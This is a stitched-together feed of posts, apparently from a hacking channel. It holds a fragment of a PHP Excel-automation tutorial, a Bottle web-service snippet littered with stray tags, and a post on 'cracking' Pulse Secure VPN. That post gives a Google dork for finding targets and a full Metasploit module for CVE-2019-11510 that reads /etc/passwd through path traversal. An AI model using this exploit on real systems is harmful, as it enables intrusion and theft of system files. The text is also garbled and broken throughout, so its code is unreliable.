▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 PHP4 COM function (windows version) : FULL
PART 4
twitter.com/UNDERCODETC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

"; #Open workbook

so that we can use it
$ wkb = $ ex-> application-> Workbooks-> Open ($ workbook) or Die (" Did not open " );

# Pre-save the original workbook, create a copy of the workbook
$ ex-> Application->
# $ ex-> Application-> Visible = 1; #This sentence goes to comment to make Excel visible

# Read and write a cell in a new worksheet
# We can read this cell E11 (Advertising in the 4th. Quarter)
$ sheets = $ wkb-> Worksheets ($ sheet); #Select the sheet
$ sheets-> activate; #Activate it
$ cell = $ sheets-> Cells (11,5); #Select the cell (Row Column number)
$ cell-> activate; #Activate the cell
print "Old Value = {$ cell-> value}
"; #Print the value of the cell: 10000
$ cell-> value = 15000; #Change it to 15000
print "New value = {$ cell-> value}
"; #Print the new value = 15000 #Finally

, recalculate this cell with the new value
$ sheets-> Calculate; #Required
if you want to calculate, manual is optional
# Can see Total effect value (cell E13)
$ cell = $ sheets-> Cells (13,5); #Select the cell (Row Column number)
$ number = Number_format ($ cell-> value);
print "New Total cost = $$ number-was $ 47,732 before.
" ;
#According to the calculation formula, the advertisement affects the company's expenses, here will display $ 57,809 #using the

Excel built-in function
# PMT (percent / 12 months, Number of payments, Loan amount)
$ pay = $ ex-> application-> pmt (0.08 / 12,10,10000);
$ pay = sprintf ("%. 2f", $ pay);
print "Monthly payment for $ 10,000 loan @ 8% interest / 10 months: $ $ pay
";

#Should print monthly payment = $ -1,037.03 #Optional

, save
$ ex-> Application-> ActiveWorkbook-> SaveAs ("Ourtest"); #Close
without asking
$ ex-> application-> ActiveWorkbook-> Close ("False");
unset ($ ex);

?>

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Crack pulse vpn Lastest CVE-Tested by UNDERCODE ?
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) LOAD THIS SHELL VIA METASPLOITE :

disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi

> # Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4

require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Post::File
def initialize(info = {})
super(update_info(info,
'Name' => 'Pulse Secure - System file leak',
'Description' => %q{
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
},
'References' =>
[
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]
],
'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
},
))

end


def run()
print_good("Checking target...")
res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)

if res && res.code == 200
print_good("Target is Vulnerable!")
data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
file_local_write(filename, data)
print_good("Parsing file.......")
parse()
else
if(res && res.code == 404)
print_error("Target not Vulnerable")
else
print_error("Ooof, try again...")
end
end
end
def parse()
current_host = datastore['RHOST']

fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
words = 0
while (line = fileObj.gets)
printable_data = line.gsub(/[^[:print:]]/, '.')
array_data = printable_data.scan(/.{1,60}/m)
for ar in array_data
if ar != "............................................................"
print_good(ar)
end
end
#print_good(printable_data)

end
fileObj.close
end
end
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Bottle deployment method of web service and postman interface:

Bottle is a fast, concise, and lightweight WSIG-based micro web framework. This framework consists of only one .py file and does not depend on any other modules except the Python standard library.


from bottle import route, request, run<font></font>
import requests<font></font>
import cv2<font></font>
import numpy as np<font></font>
<font></font>
@route('/testimg',method='POST')#<font></font>
def testimg():<font></font>
try:<font></font>
params<font></font>
result = {}<font></font>
result["name"] = request.query.name#<font></font>
result["nums"] = request.query.nums<font></font>
<font></font>
#json<font></font>
#print(request.json)<font></font>
urllist = request.json["urllist"]<font></font>
#print(type(urllist))<font></font>
#print(urllist)<font></font>
imgPath = []<font></font>
for i in range(len(urllist)):<font></font>
imgPath.append(urllist[i])<font></font>
<font></font>
for i in range(len(imgPath)):<font></font>
#print(imgPath[i])<font></font>
#url<font></font>
rev = requests.get(imgPath[i], verify=False) # , timeout=config.timeout<font></font>
img = cv2.imdecode(np.frombuffer(rev.content, np.uint8), cv2.IMREAD_COLOR) # 片<font></font>
rec = 0<font></font>
<font></font>
return str(rec)<font></font>
except BaseException as e:<font></font>
logger.exception(e)<font></font>
return str(0)<font></font>
<font></font>
if name == "main":<font></font>
<font></font>
run(host='172.17.0.2', port=49166, debug=False)
Postman interface test.

params passes parameters.

The body transmits text data such as json.

@Phenicia

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁